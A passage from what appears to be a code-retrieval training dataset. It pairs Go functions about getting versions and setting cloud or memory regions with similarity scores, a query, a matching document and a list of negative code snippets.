ret0\n\terr := _Bridge.contract.Call(opts, out, \"getVersion\")\n\treturn *ret0, err\n}", "func (c *Client) Version() (v Version, err error) {\n\t// Log\n\tvar m = \"Retrieve Open Data RATP version\"\n\tc.Logger.Debugf(\"[Start] %s\", m)\n\tdefer func(now time.Time) {\n\t\tc.Logger.Debugf(\"[End] %s in %s\", m, time.Since(now))\n\t}(time.Now())\n\n\t// Build request\n\tvar req = Envelope{Body: &EnvelopeBody{GetVersionRequest: &GetVersionRequest{}}}\n\n\t// Send request\n\tvar resp Envelope\n\tif resp, err = c.SendWithMaxRetries(\"getVersion\", req); err != nil {\n\t\treturn\n\t}\n\tv = resp.Body.GetVersionResponse.Version\n\treturn\n}", "func GetVersion() string {\n\tif metadata == \"\" {\n\t\treturn version\n\t}\n\treturn version + \"+\" + metadata\n}", "func (n *Namespace) GetVersion() string {\n\treturn n.Version\n}", "func (c *Current) Version() string {\n\tswitch c.selectedRadio {\n\tcase FocusOnInvolved, FocusOnCurrentNamespace:\n\t\treturn curr.resourceVersion\n\tcase FocusOnAllNamespace:\n\t\treturn curr.resourceVersionAllNamespace\n\t}\n\treturn \"0\"\n}", "func GetVersion(val, network int) int {\n\tif network == Data.Mainnet.ID {\n\t\treturn 0x68000000 | val\n\t} else if network == Data.Testnet.ID {\n\t\treturn 0x98000000 | val\n\t}\n\treturn 0x60000000 | val\n}", "func GetVersion() string {\n\treturn vboxmanage.GetVMProperty(boxName, \"boxVersion\")\n}", "func (entry *Entry) GetVersion() int {\n\tversion := 1\n\tif entry.Sys != nil {\n\t\tversion = entry.Sys.Version\n\t}\n\n\treturn version\n}", "func (entry *Entry) GetVersion() int {\n\tversion := 1\n\tif entry.Sys != nil {\n\t\tversion = entry.Sys.Version\n\t}\n\n\treturn version\n}", "func (es *EtcdService) GetVersion(system string, collection string) (int64, error) {\n\tctx := context.Background()\n\tresponse, err := es.client.Get(ctx, system+\"_\"+collection)\n\tif err != nil {\n\t\treturn -1, err\n\t}\n\t// Processing if key absents, thus initial version is requested\n\tif len(response.Kvs) == 0 {\n\t\treturn 0, nil\n\t}\n\tversion, err := strconv.ParseInt(string(response.Kvs[0].Value), 10, 64)\n\tif err != nil {\n\t\treturn -1, err\n\t}\n\treturn version, nil\n}", "func (o *Basic) Version() string {\n\tif \"\" == o.Options.Version {\n\t\treturn defaultVersion\n\t}\n\treturn o.Options.Version\n}", "func (s *AppServerV3) GetVersion() string {\n\treturn s.Version\n}", "func GetVersion() string {\n\tversion := fmt.Sprintf(`Version : %s\nTag : %s\nBuildTime : %s\nGitHash : %s\nRunMode : %s\nDistribution: %s\nServiceName : %s\n`, CCVersion, CCTag, CCBuildTime, CCGitHash, CCRunMode, CCDistro, ServiceName)\n\treturn version\n}", "func (o ParserConfigResponseOutput) Version() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ParserConfigResponse) string { return v.Version }).(pulumi.StringOutput)\n}", "func GetVersion() Version {\n\treturn Version{\n\t\tVersion: \"v\" + version,\n\t\tGitCommit: gitCommit,\n\t}\n}", "func (m *Heartbeat) GetVersion() int {\n\tif m.HasExtensionFieldValues {\n\t\treturn 2\n\t}\n\n\treturn 1\n}", "func (m *ManagedAppPolicy) GetVersion()(*string) {\n return m.version\n}", "func (swagger *MgwSwagger) GetVersion() string {\n\treturn swagger.version\n}", "func (f *Features) getVersion(ctx context.Context, adminDB *mongo.Database) {\n\tcmd := bson.D{\n\t\t{\n\t\t\tKey: \"buildInfo\",\n\t\t\tValue: 1,\n\t\t},\n\t}\n\tvar result buildInfo\n\terr := adminDB.RunCommand(ctx, cmd).Decode(&result)\n\tif err != nil {\n\t\tf.MongoVersion = &semver.Version{}\n\t\treturn\n\t}\n\n\tf.MongoVersion = semver.MustParse(result.Version)\n}", "func GetVersion() (major, minor, revision int) {\n\tvar (\n\t\tmaj C.int\n\t\tmin C.int\n\t\trev C.int\n\t)\n\n\tC.glfwGetVersion(&maj, &min, &rev)\n\treturn int(maj), int(min), int(rev)\n}", "func (c *Client) GetVersion() (string, string, error) {\n\tctx, cancel := getContextWithTimeout(hyperContextTimeout)\n\tdefer cancel()\n\n\tresp, err := c.client.Version(ctx, &types.VersionRequest{})\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\treturn resp.Version, resp.ApiVersion, nil\n}", "func (o *SoftwareTechs) GetVersion() string {\n\tif o == nil || o.Version == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Version\n}", "func (c *ConfigManager) GetGlobalVersion(gc *GlobalConfig) uint64 {\n\tc.RLock()\n\tdefer c.RUnlock()\n\treturn gc.getVersionLocked()\n}", "func (o HiveMetastoreConfigOutput) Version() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v HiveMetastoreConfig) *string { return v.Version }).(pulumi.StringPtrOutput)\n}", "func Version() string {\n\treturn versionNumber\n}", "func (p *ProvisionTokenV2) GetVersion() string {\n\treturn p.Version\n}", "func (store ConfigurationStore) GetAPIVersion() string {\n\treturn string(APIVersion_Value)\n}", "func (c *Client) GetVersion(ctx context.Context) (rpc.GetVersionResult, error) {\n\tres, err := c.RpcClient.GetVersion(ctx)\n\terr = checkRpcResult(res.GeneralResponse, err)\n\tif err != nil {\n\t\treturn rpc.GetVersionResult{}, err\n\t}\n\treturn res.Result, nil\n}", "func (o *VirtualizationIweHost) GetVersion() string {\n\tif o == nil || o.Version == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Version\n}", "func Version() string {\n\treturn libs.Version()\n}", "func (a *Server) GetVersion(context.Context, *restapi.GetVersionRequest) restapi.GetVersionResponseSet {\n\treturn restapi.GetVersionResponseSet{Response200: &restapi.VersionResponse{\n\t\tVersion: version.Current().String()}}\n}", "func (s *Structured) GetVersion() string {\n\treturn s.cloudEvent.CloudEventsVersion\n}", "func (c *ConfigManager) GetConfig(version *configpb.Version, component, componentID string) (*configpb.Version, string, *configpb.Status) {\n\tc.RLock()\n\tdefer c.RUnlock()\n\tvar config string\n\tvar err error\n\tvar status *configpb.Status\n\tvar localCfgs map[string]*LocalConfig\n\tvar cfg *LocalConfig\n\tvar ok bool\n\n\tif localCfgs, ok = c.LocalCfgs[component]; !ok {\n\t\treturn c.getLatestVersionLocked(component, componentID), config, &configpb.Status{Code: configpb.StatusCode_COMPONENT_NOT_FOUND}\n\t}\n\n\tif cfg, ok = localCfgs[componentID]; !ok {\n\t\treturn c.getLatestVersionLocked(component, componentID), config, &configpb.Status{Code: configpb.StatusCode_COMPONENT_ID_NOT_FOUND}\n\t}\n\n\tconfig, err = c.getComponentCfg(component, componentID)\n\tif err != nil {\n\t\treturn version, \"\", &configpb.Status{\n\t\t\tCode: configpb.StatusCode_UNKNOWN,\n\t\t\tMessage: errEncode(err),\n\t\t}\n\t}\n\tif versionEqual(cfg.getVersionLocked(), version) {\n\t\tstatus = &configpb.Status{Code: configpb.StatusCode_OK}\n\t} else {\n\t\tstatus = &configpb.Status{Code: configpb.StatusCode_WRONG_VERSION}\n\t}\n\n\treturn c.getLatestVersionLocked(component, componentID), config, status\n}", "func (wlt *Wallet) GetVersion() string {\n\treturn wlt.Meta[\"version\"]\n}", "func (e *Event) GetVersion() string {\n\treturn e.BaseEvent.Version\n}", "func (o *Manager) GetVersion(ctx context.Context) (version string, err error) {\n\terr = o.object.CallWithContext(ctx, \"org.freedesktop.DBus.Properties.Get\", 0, InterfaceManager, \"Version\").Store(&version)\n\treturn\n}", "func (h *Hub) Version() (result string, err error) {\n\treturn h.client.sendXPathRequest(mySagemcomBoxDeviceInfoProductClass)\n}", "func (obj *Edge) GetVersion() int {\n\treturn obj.getVersion()\n}", "func (s *authzServer) GetVersion(\n\tctx context.Context,\n\treq *ver_api.VersionInfoRequest) (*ver_api.VersionInfo, error) {\n\treturn &ver_api.VersionInfo{\n\t\tName: constants.ServiceName,\n\t\tVersion: version.Version,\n\t\tSha: version.GitSHA,\n\t\tBuilt: version.BuildTime,\n\t}, nil\n}", "func GetVersion() (major, minor, rev int) {\n\tvar cMajor, cMinor, cRev C.int\n\tC.glfwGetVersion(&cMajor, &cMinor, &cRev)\n\tmajor, minor, rev = int(cMajor), int(cMinor), int(cRev)\n\treturn\n}" ]
[ "0.76337713", "0.7046342", "0.6860525", "0.6821554", "0.6817502", "0.6817502", "0.6807261", "0.6802234", "0.6780509", "0.6766513", "0.6756908", "0.6733999", "0.6733999", "0.67327684", "0.6674252", "0.66709596", "0.661521", "0.6614874", "0.66082346", "0.66082346", "0.6597021", "0.6588547", "0.6529238", "0.6522174", "0.6492114", "0.64437515", "0.6424971", "0.6418553", "0.6399592", "0.6331983", "0.6292162", "0.6272426", "0.6264848", "0.62607473", "0.62401783", "0.6219372", "0.621871", "0.6211508", "0.6198934", "0.6198741", "0.61875427", "0.6187453", "0.6182507", "0.6170668", "0.6169768", "0.61658937", "0.61621237", "0.61621237", "0.61621237", "0.61621237", "0.61621237", "0.61621237", "0.61621237", "0.61621237", "0.6158895", "0.6157564", "0.6141244", "0.6088029", "0.60816985", "0.6071719", "0.60495764", "0.6042747", "0.6039804", "0.60328996", "0.6027672", "0.6016004", "0.60159796", "0.6015763", "0.6015763", "0.60118115", "0.6010956", "0.6002357", "0.60014224", "0.59991413", "0.5994365", "0.59930676", "0.59827125", "0.5981273", "0.5981044", "0.59773076", "0.5964303", "0.59580904", "0.5958062", "0.59540474", "0.5952326", "0.594448", "0.59346515", "0.59328914", "0.5928818", "0.59238493", "0.59181875", "0.59146786", "0.5910197", "0.590818", "0.5901054", "0.5899711", "0.58862853", "0.58775777", "0.5876045", "0.58652014" ]
0.71078044
1
SetRegion set new region.
func (s *serverConfigV14) SetRegion(region string) { serverConfigMu.Lock() defer serverConfigMu.Unlock() s.Region = region }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func SetRegion(r string) {\n\tcurrentRegion = r\n}", "func (client *IdentityClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"identity\", \"https://identity.{region}.oci.{secondLevelDomain}\")\n}", "func (p *Patch) SetRegion(value mat.AABB) {\n\tif value == mat.ZA {\n\t\tp.Patch.SetIntensity(0)\n\t} else {\n\t\tp.Patch = ggl.NPatch(value, p.Padding)\n\t}\n}", "func (client *BastionClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"bastion\", \"https://bastion.{region}.oci.{secondLevelDomain}\")\n}", "func (client *OccMetricsClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"ocicontrolcenter\", \"https://control-center.{region}.oci.{secondLevelDomain}\")\n}", "func (client *AccessGovernanceCPClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"accessgovernancecp\", \"https://cp-prod.access-governance.{region}.oci.{secondLevelDomain}\")\n}", "func (client *RoverClusterClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"rover\", \"https://rover.{region}.oci.{secondLevelDomain}\")\n}", "func (client *NotificationDataPlaneClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).Endpoint(\"notification\")\n}", "func (client *GovernanceClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"tenantmanagercontrolplane\", \"https://organizations.{region}.oci.{secondLevelDomain}\")\n}", "func (c *Client) SetRegion(region Region) {\n\tc.region = region\n\n\tswitch region {\n\tcase CN:\n\t\tc.oauthHost = \"https://www.battlenet.com.cn\"\n\t\tc.apiHost = \"https://gateway.battlenet.com.cn\"\n\t\tc.dynamicNamespace = \"dynamic-zh\"\n\t\tc.dynamicClassicNamespace = \"dynamic-classic-zh\"\n\t\tc.profileNamespace = \"profile-zh\"\n\t\tc.staticNamespace = \"static-zh\"\n\t\tc.staticClassicNamespace = \"static-classic-zh\"\n\tdefault:\n\t\tc.oauthHost = fmt.Sprintf(\"https://%s.battle.net\", region)\n\t\tc.apiHost = fmt.Sprintf(\"https://%s.api.blizzard.com\", region)\n\t\tc.dynamicNamespace = fmt.Sprintf(\"dynamic-%s\", region)\n\t\tc.dynamicClassicNamespace = fmt.Sprintf(\"dynamic-classic-%s\", region)\n\t\tc.profileNamespace = fmt.Sprintf(\"profile-%s\", region)\n\t\tc.staticNamespace = fmt.Sprintf(\"static-%s\", region)\n\t\tc.staticClassicNamespace = fmt.Sprintf(\"static-classic-%s\", region)\n\t}\n\n\tc.cfg.TokenURL = c.oauthHost + \"/oauth/token\"\n\tc.httpClient = c.cfg.Client(context.Background())\n}", "func (client *ComplianceDocClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"compdocsapi\", \"https://compdocs.{region}.oci.{secondLevelDomain}\")\n}", "func (client *StorageGatewayClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"storagegateway\", \"https://storage-gateway.{region}.oci.{secondLevelDomain}\")\n}", "func (o *DcimRacksListParams) SetRegion(region *string) {\n\to.Region = region\n}", "func (o *GetClientConfigV1ConfigByNameParams) SetRegion(region *string) {\n\to.Region = region\n}", "func (client *DnsClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"dns\", \"https://dns.{region}.{secondLevelDomain}\")\n}", "func (client *ArtifactsClient) SetRegion(region string) {\n\tclient.Host = common.StringToRegion(region).EndpointForTemplate(\"artifacts\", \"https://artifacts.{region}.oci.{secondLevelDomain}\")\n}", "func (c *Client) SetRegion(region string) {\n\tc.config.Region = region\n}", "func (o *DisplayInfo) SetRegion(v string) {\n\to.Region = &v\n}", "func (o *ResolveBatchParams) SetRegion(region *string) {\n\to.Region = region\n}", "func (s *Index) SetRegion(v string) *Index {\n\ts.Region = &v\n\treturn s\n}", "func (o *DcimSitesReadParams) SetRegion(region *string) {\n\to.Region = region\n}", "func (s *Distribution) SetRegion(v string) *Distribution {\n\ts.Region = &v\n\treturn s\n}", "func (o *Workloadv1Location) SetRegion(v string) {\n\to.Region = &v\n}", "func (s *LogSource) SetRegion(v string) *LogSource {\n\ts.Region = &v\n\treturn s\n}", "func (o *GetTrafficFilterClaimedLinkIdsParams) SetRegion(region *string) {\n\to.Region = region\n}", "func (m *MockCall) SetRegion(arg0 hrpc.RegionInfo) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"SetRegion\", arg0)\n}", "func (s *DestinationToCreate) SetRegion(v string) *DestinationToCreate {\n\ts.Region = &v\n\treturn s\n}", "func (s *Resource) SetRegion(v string) *Resource {\n\ts.Region = &v\n\treturn s\n}", "func (r *InvokeRequest) SetRegionId(regionId string) {\n r.RegionId = regionId\n}", "func (s *DataLakeAutoEnableNewAccountConfiguration) SetRegion(v string) *DataLakeAutoEnableNewAccountConfiguration {\n\ts.Region = &v\n\treturn s\n}", "func (bc *BasicLineGraph) PutRegion(region *RegionInfo) []*RegionInfo {\n\tbc.Lock()\n\tdefer bc.Unlock()\n\treturn bc.Regions.SetRegion(region)\n}", "func (s *Destination) SetRegion(v string) *Destination {\n\ts.Region = &v\n\treturn s\n}", "func (s *DataLakeException) SetRegion(v string) *DataLakeException {\n\ts.Region = &v\n\treturn s\n}", "func (mr *MockCallMockRecorder) SetRegion(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"SetRegion\", reflect.TypeOf((*MockCall)(nil).SetRegion), arg0)\n}", "func (s *ClusterEndpoint) SetRegion(v string) *ClusterEndpoint {\n\ts.Region = &v\n\treturn s\n}", "func (s *DescribeCbsStoragesInput) SetRegion(v string) *DescribeCbsStoragesInput {\n\ts.Region = &v\n\treturn s\n}", "func (s *SignInDistribution) SetRegion(v string) *SignInDistribution {\n\ts.Region = &v\n\treturn s\n}", "func (o *LogsArchiveDestinationAzure) SetRegion(v string) {\n\to.Region = &v\n}", "func (b *SubscriptionMetricsBuilder) Region(value string) *SubscriptionMetricsBuilder {\n\tb.region = value\n\tb.bitmap_ |= 8192\n\treturn b\n}", "func (c *Client) SetRegionParameters(region Region, locale Locale) error {\n\terr := validateRegionLocalePair(region, locale)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tc.region = region\n\tc.locale = locale\n\n\tswitch region {\n\tcase CN:\n\t\tc.oauthHost = \"https://www.battlenet.com.cn\"\n\t\tc.apiHost = \"https://gateway.battlenet.com.cn\"\n\t\tc.dynamicNamespace = \"dynamic-zh\"\n\t\tc.dynamicClassicNamespace = \"dynamic-classic-zh\"\n\t\tc.profileNamespace = \"profile-zh\"\n\t\tc.staticNamespace = \"static-zh\"\n\t\tc.staticClassicNamespace = \"static-classic-zh\"\n\tdefault:\n\t\tc.oauthHost = fmt.Sprintf(\"https://%s.battle.net\", region)\n\t\tc.apiHost = fmt.Sprintf(\"https://%s.api.blizzard.com\", region)\n\t\tc.dynamicNamespace = fmt.Sprintf(\"dynamic-%s\", region)\n\t\tc.dynamicClassicNamespace = fmt.Sprintf(\"dynamic-classic-%s\", region)\n\t\tc.profileNamespace = fmt.Sprintf(\"profile-%s\", region)\n\t\tc.staticNamespace = fmt.Sprintf(\"static-%s\", region)\n\t\tc.staticClassicNamespace = fmt.Sprintf(\"static-classic-%s\", region)\n\t}\n\n\tc.clntCredCfg.TokenURL = c.oauthHost + \"/oauth/token\"\n\tc.httpClient = c.clntCredCfg.Client(\n\t\tcontext.WithValue(context.TODO(), oauth2.HTTPClient, c.cfg.HTTPClient),\n\t)\n\n\treturn nil\n}", "func RegisterRegion(updateFunc func()) *Region {\n\treturn (*Region)(newRegion(updateFunc))\n}", "func (s *DataLakeConfiguration) SetRegion(v string) *DataLakeConfiguration {\n\ts.Region = &v\n\treturn s\n}", "func (s *DataLakeResource) SetRegion(v string) *DataLakeResource {\n\ts.Region = &v\n\treturn s\n}", "func (s *ListIndexesInput) SetRegions(v []*string) *ListIndexesInput {\n\ts.Regions = v\n\treturn s\n}", "func (b *ServiceClusterBuilder) Region(value string) *ServiceClusterBuilder {\n\tb.region = value\n\tb.bitmap_ |= 128\n\treturn b\n}", "func (c *Config) setRegionFields(region string) error {\n\tinput := region\n\tregion = strings.ToLower(region)\n\n\tvar name, key string\n\tname, ok := ociRegions[region]\n\tif !ok {\n\t\tfor key, name = range ociRegions {\n\t\t\tif name == region {\n\t\t\t\tok = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"tried to connect to unsupported OCI region %q\", input)\n\t\t}\n\t} else {\n\t\tkey = region\n\t}\n\n\tc.Auth.Region = name\n\tc.Auth.RegionKey = key\n\n\treturn nil\n}", "func setCEPRegion(cep string, region string) {\n\tcep = strings.ReplaceAll(cep, \"-\", \"\")\n\tkey := \"freightsrv-cep-region-\" + cep\n\t// Save for one wekeend.\n\t_ = redisSet(key, region, time.Hour*168)\n}", "func SetByteArrayRegion(env *C.JNIEnv, array C.jbyteArray, start, _len C.jsize, buf *C.jbyte) {\n\tC._GoJniSetByteArrayRegion(env, array, start, _len, buf)\n}", "func (f *Factory) WithRegion(region string) *Factory {\n\tf.region = region\n\treturn f\n}", "func (a *AdditionalGUTI) SetAMFRegionID(aMFRegionID uint8) {}", "func (s *ListLogSourcesInput) SetRegions(v []*string) *ListLogSourcesInput {\n\ts.Regions = v\n\treturn s\n}", "func (tv *TextView) HighlightRegion(reg TextRegion) {\n\tprevh := tv.Highlights\n\ttv.Highlights = []TextRegion{reg}\n\ttv.UpdateHighlights(prevh)\n}", "func WithRegion(with string) wrapping.Option {\n\treturn func() interface{} {\n\t\treturn OptionFunc(func(o *options) error {\n\t\t\to.withRegion = with\n\t\t\treturn nil\n\t\t})\n\t}\n}", "func (s *AwsLogSourceConfiguration) SetRegions(v []*string) *AwsLogSourceConfiguration {\n\ts.Regions = v\n\treturn s\n}", "func (r *StatusReportRequest) SetRegionId(regionId string) {\n r.RegionId = regionId\n}", "func WithRegion(region string) InstanceOpt {\n\treturn func(i *Instance) error {\n\t\ti.region = region\n\t\treturn nil\n\t}\n}", "func (c *Config) SetRandomRegion() {\n\tvar regions []string\n\tif c.Regions == nil || len(c.Regions) == 0 {\n\t\tregions = []string{\"eastus\", \"southeastasia\", \"westus2\", \"westeurope\"}\n\t} else {\n\t\tregions = c.Regions\n\t}\n\tlog.Printf(\"Picking Random Region from list %s\\n\", regions)\n\tr := rand.New(rand.NewSource(time.Now().UnixNano()))\n\tc.Location = regions[r.Intn(len(regions))]\n\tos.Setenv(\"LOCATION\", c.Location)\n\tlog.Printf(\"Picked Random Region:%s\\n\", c.Location)\n}", "func (s *ListDataLakesInput) SetRegions(v []*string) *ListDataLakesInput {\n\ts.Regions = v\n\treturn s\n}", "func SetIntArrayRegion(env *C.JNIEnv, array C.jintArray, start, _len C.jsize, buf *C.jint) {\n\tC._GoJniSetIntArrayRegion(env, array, start, _len, buf)\n}", "func WithRegion(region string) configurer {\n\treturn func(conf *config) {\n\t\tconf.region = region\n\t}\n}", "func WithRegion(ctx workflow.Context, secretID string) workflow.Context {\n\treturn workflow.WithValue(ctx, ContextRegion, secretID)\n}", "func (r *UpdateListenerRequest) SetRegionId(regionId string) {\n r.RegionId = regionId\n}", "func (s *DeleteDataLakeInput) SetRegions(v []*string) *DeleteDataLakeInput {\n\ts.Regions = v\n\treturn s\n}", "func (r *DescribeBillSummarysRequest) SetRegionId(regionId string) {\n r.RegionId = regionId\n}", "func (m *PrinterLocation) SetCountryOrRegion(value *string)() {\n err := m.GetBackingStore().Set(\"countryOrRegion\", value)\n if err != nil {\n panic(err)\n }\n}", "func SetRegionLockNamespace(ns string) {\n\tregionLockNamespace = ns\n}", "func (p *EC2Provisioner) WithRegion(region string) {\n\tp.client.Config.WithRegion(region)\n\tp.client = ec2.New(p.session, &p.client.Config)\n}", "func NewRegion(start, end []byte) *metapb.Region {\n\treturn &metapb.Region{\n\t\tStartKey: start,\n\t\tEndKey: end,\n\t\tRegionEpoch: &metapb.RegionEpoch{},\n\t}\n}", "func EnableRegion(n int, start uint32, size int, sp int) (err error) {\n\tvar attrs uint32\n\tvar s uint32\n\n\tif n < 0 || n+1 > Regions() {\n\t\treturn errors.New(\"invalid region index\")\n\t}\n\n\tif reg.Read(TZASC_BYPASS) != 1 {\n\t\treturn errors.New(\"TZASC inactive (bypass detected)\")\n\t}\n\n\tif n == 0 {\n\t\treg.SetN(TZASC_REGION_ATTRS_0, REGION_ATTRS_SP, 0b1111, uint32(sp))\n\t\treturn\n\t}\n\n\tif start%(1<<15) != 0 {\n\t\treturn errors.New(\"incompatible start address\")\n\t}\n\n\tif start != 0 && (start%uint32(size)) != 0 {\n\t\treturn errors.New(\"start address must be a multiple of its region size\")\n\t}\n\n\tif sp > 0b1111 {\n\t\treturn errors.New(\"invalid security permissions\")\n\t}\n\n\t// size = 2^(s+1)\n\tfor i := uint32(SIZE_MIN); i <= SIZE_MAX; i++ {\n\t\tif size == (1 << (i + 1)) {\n\t\t\ts = i\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif s == 0 {\n\t\treturn errors.New(\"incompatible region size\")\n\t}\n\n\tbits.SetN(&attrs, REGION_ATTRS_SP, 0b1111, uint32(sp))\n\tbits.SetN(&attrs, REGION_ATTRS_SIZE, 0b111111, s)\n\tbits.Set(&attrs, REGION_ATTRS_EN)\n\n\toff := uint32(0x10 * n)\n\n\treg.Write(TZASC_REGION_SETUP_LOW_0+off, start&0xffff8000)\n\treg.Write(TZASC_REGION_SETUP_HIGH_0+off, 0)\n\treg.Write(TZASC_REGION_ATTRS_0+off, attrs)\n\n\treturn\n}", "func (b *ClusterBuilder) Region(value *CloudRegionBuilder) *ClusterBuilder {\n\tb.region = value\n\tif value != nil {\n\t\tb.bitmap_ |= 137438953472\n\t} else {\n\t\tb.bitmap_ &^= 137438953472\n\t}\n\treturn b\n}", "func (b *Backend) InjectRegion(region string) {\n\tb.gatewayStatus.Region = region\n}", "func (s *ListDataLakeExceptionsInput) SetRegions(v []*string) *ListDataLakeExceptionsInput {\n\ts.Regions = v\n\treturn s\n}", "func RegisterMetricInRegion(\n\tpath string,\n\tmetric interface{},\n\tr *Region,\n\tunit units.Unit,\n\tdescription string) error {\n\treturn root.registerMetric(newPathSpec(path), metric, (*region)(r), unit, description)\n}", "func SetShortArrayRegion(env *C.JNIEnv, array C.jshortArray, start, _len C.jsize, buf *C.jshort) {\n\tC._GoJniSetShortArrayRegion(env, array, start, _len, buf)\n}", "func (m *VirtualEndpoint) SetSupportedRegions(value []CloudPcSupportedRegionable)() {\n err := m.GetBackingStore().Set(\"supportedRegions\", value)\n if err != nil {\n panic(err)\n }\n}", "func (s *DataLakeReplicationConfiguration) SetRegions(v []*string) *DataLakeReplicationConfiguration {\n\ts.Regions = v\n\treturn s\n}", "func (this *BuoyController) Region() {\n\tbuoyBusiness.Region(&this.BaseController, this.GetString(\":region\"))\n}", "func SetBooleanArrayRegion(env *C.JNIEnv, array C.jbooleanArray, start, l C.jsize, buf *C.jboolean) {\n\tC._GoJniSetBooleanArrayRegion(env, array, start, l, buf)\n}", "func (b *AWSPlatformStatusApplyConfiguration) WithRegion(value string) *AWSPlatformStatusApplyConfiguration {\n\tb.Region = &value\n\treturn b\n}", "func (r *AddTemplateRequest) SetRegionId(regionId string) {\n r.RegionId = regionId\n}", "func NewRegion(c *config.Config, client *api.Client, channels *RegionBroadcastChannels) (*Region, error) {\n\treturn &Region{\n\t\tConfig: c,\n\t\tClient: client,\n\t\tbroadcastChannels: channels,\n\t\tregions: make([]string, 0),\n\t\tservices: &InternalServices{},\n\t\tnodes: &InternalNodes{},\n\t}, nil\n}", "func (s *LexBot) SetLexRegion(v string) *LexBot {\n\ts.LexRegion = &v\n\treturn s\n}", "func SetLongArrayRegion(env *C.JNIEnv, array C.jlongArray, start, _len C.jsize, buf *C.jlong) {\n\tC._GoJniSetLongArrayRegion(env, array, start, _len, buf)\n}", "func StoreSessionRegion(session *sessions.Session, region string) {\n\tif session == nil {\n\t\treturn\n\t}\n\tsession.Values[regionKey] = region\n}", "func (e Endpoints) AddRegion(ctx context.Context, token string, region registry.Region) (err error) {\n\trequest := AddRegionRequest{\n\t\tRegion: region,\n\t\tToken: token,\n\t}\n\tresponse, err := e.AddRegionEndpoint(ctx, request)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn response.(AddRegionResponse).Err\n}", "func SetCharArrayRegion(env *C.JNIEnv, array C.jcharArray, start, _len C.jsize, buf *C.jchar) {\n\tC._GoJniSetCharArrayRegion(env, array, start, _len, buf)\n}", "func (o *DcimRacksListParams) SetRegionn(regionn *string) {\n\to.Regionn = regionn\n}", "func (s *Service) RegionChange(c context.Context, rid, rand int, plat int8, build int, mobiApp string) (sis []*show.Item) {\n\tif rand < 0 {\n\t\trand = 0\n\t}\n\tvar (\n\t\tcnt = 4\n\t\tpn = rand + 1\n\t\tisOsea = model.IsOverseas(plat)\n\t\tbangumiType = 0\n\t\ttmp []*show.Item\n\t)\n\tif (mobiApp == \"iphone\" && build > 5600) || (mobiApp == \"android\" && build > 507000) {\n\t\tif _, isBangumi := _bangumiReids[rid]; isBangumi {\n\t\t\tif (plat == model.PlatIPhone && build > 6050) || (plat == model.PlatAndroid && build > 512007) {\n\t\t\t\tbangumiType = _bangumiEpisodeID\n\t\t\t} else {\n\t\t\t\tbangumiType = _bangumiSeasonID\n\t\t\t}\n\t\t}\n\t}\n\tif model.IsIPad(plat) {\n\t\tcnt = 8\n\t}\n\tas, aids, err := s.dyn.RegionDynamic(c, rid, pn, cnt)\n\tif err != nil {\n\t\tlog.Error(\"s.rcmmnd.RegionDynamic(%d, %d, %d) error(%v)\", rid, pn, cnt, err)\n\t\tsis = []*show.Item{}\n\t\treturn\n\t}\n\tif bangumiType != 0 {\n\t\ttmp = s.fromArchivesBangumiOsea(c, as, aids, isOsea, bangumiType)\n\t} else {\n\t\ttmp = s.fromArchivesOsea(as, isOsea)\n\t}\n\tsis = append(sis, tmp...)\n\treturn\n}", "func (m *Mutator) MutateRegion(awsCluster infrastructurev1alpha3.AWSCluster) ([]mutator.PatchOperation, error) {\n\tvar result []mutator.PatchOperation\n\tif awsCluster.Spec.Provider.Region == \"\" {\n\t\t// If the region is not set, we default here\n\t\tm.Log(\"level\", \"debug\", \"message\", fmt.Sprintf(\"AWSCluster %s region is not set and will be defaulted to %s\",\n\t\t\tawsCluster.ObjectMeta.Name,\n\t\t\tm.region),\n\t\t)\n\t\tpatch := mutator.PatchAdd(\"/spec/provider/region\", m.region)\n\t\tresult = append(result, patch)\n\t}\n\treturn result, nil\n}", "func (s *Runner) SetRegionsPerTask(regionsPerTask int) {\n\tif regionsPerTask < 1 {\n\t\tpanic(\"RangeTaskRunner: regionsPerTask should be at least 1\")\n\t}\n\ts.regionsPerTask = regionsPerTask\n}", "func SelectRegion(optRegion string) (region string, err error) {\n\tif optRegion == \"OS Environment 'AWS_REGION'\" {\n\t\tif os.Getenv(\"AWS_REGION\") != \"\" {\n\t\t\treturn os.Getenv(\"AWS_REGION\"), err\n\t\t}\n\t\treturn usEast1, err\n\t}\n\treturn optRegion, err\n}", "func (b *Buffer) SetArea(r image.Rectangle) {\n\tb.Area.Max = r.Max\n\tb.Area.Min = r.Min\n}", "func (pc *TwoD) SetRange(min, max, sigma float32) {\n\tpc.Min.Set(min, min)\n\tpc.Max.Set(max, max)\n\tpc.Sigma.Set(sigma, sigma)\n}", "func (m *VppToken) SetCountryOrRegion(value *string)() {\n m.countryOrRegion = value\n}", "func (f *Feature) SetBounds(newLocation *rtreego.Rect) {\n\tf.location = newLocation\n}", "func (o *GetMarketsRegionIDHistoryParams) SetRegionID(regionID int32) 